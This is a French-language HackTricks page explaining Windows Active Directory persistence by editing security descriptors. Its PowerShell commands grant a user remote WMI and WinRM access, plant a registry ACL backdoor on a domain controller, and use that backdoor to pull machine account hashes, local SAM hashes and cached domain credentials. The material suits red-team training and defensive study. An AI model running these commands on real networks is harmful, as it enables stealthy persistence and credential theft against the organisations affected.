Security Descriptors

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Descripteurs de sécurité

À partir de la documentation : Le langage de définition de descripteur de sécurité (SDDL) définit le format utilisé pour décrire un descripteur de sécurité. SDDL utilise des chaînes ACE pour DACL et SACL : type_ace;flags_ace;droits;guid_objet;guid_objet_hérité;sid_compte;

Les descripteurs de sécurité sont utilisés pour stocker les autorisations qu'un objet possède sur un objet. Si vous pouvez simplement apporter un petit changement dans le descripteur de sécurité d'un objet, vous pouvez obtenir des privilèges très intéressants sur cet objet sans avoir besoin d'être membre d'un groupe privilégié.

Ainsi, cette technique de persistance est basée sur la capacité à obtenir tous les privilèges nécessaires contre certains objets, afin de pouvoir effectuer une tâche qui nécessite généralement des privilèges d'administrateur mais sans avoir besoin d'être administrateur.

Accès à WMI

Vous pouvez donner à un utilisateur l'accès pour exécuter à distance WMI en utilisant ceci :

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove

Accès à WinRM

Donnez accès à la console PS WinRM à un utilisateur en utilisant ceci:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Accès distant aux hachages

Accédez au registre et dump les hachages en créant une porte dérobée Reg en utilisant DAMP, afin de pouvoir récupérer à tout moment le hachage de l'ordinateur, le SAM et toute information d'identification AD mise en cache sur l'ordinateur. Ainsi, il est très utile de donner cette autorisation à un utilisateur régulier contre un ordinateur contrôleur de domaine:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Consultez Billets Silver pour apprendre comment vous pourriez utiliser le hachage du compte informatique d'un contrôleur de domaine.

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Dernière mise à jour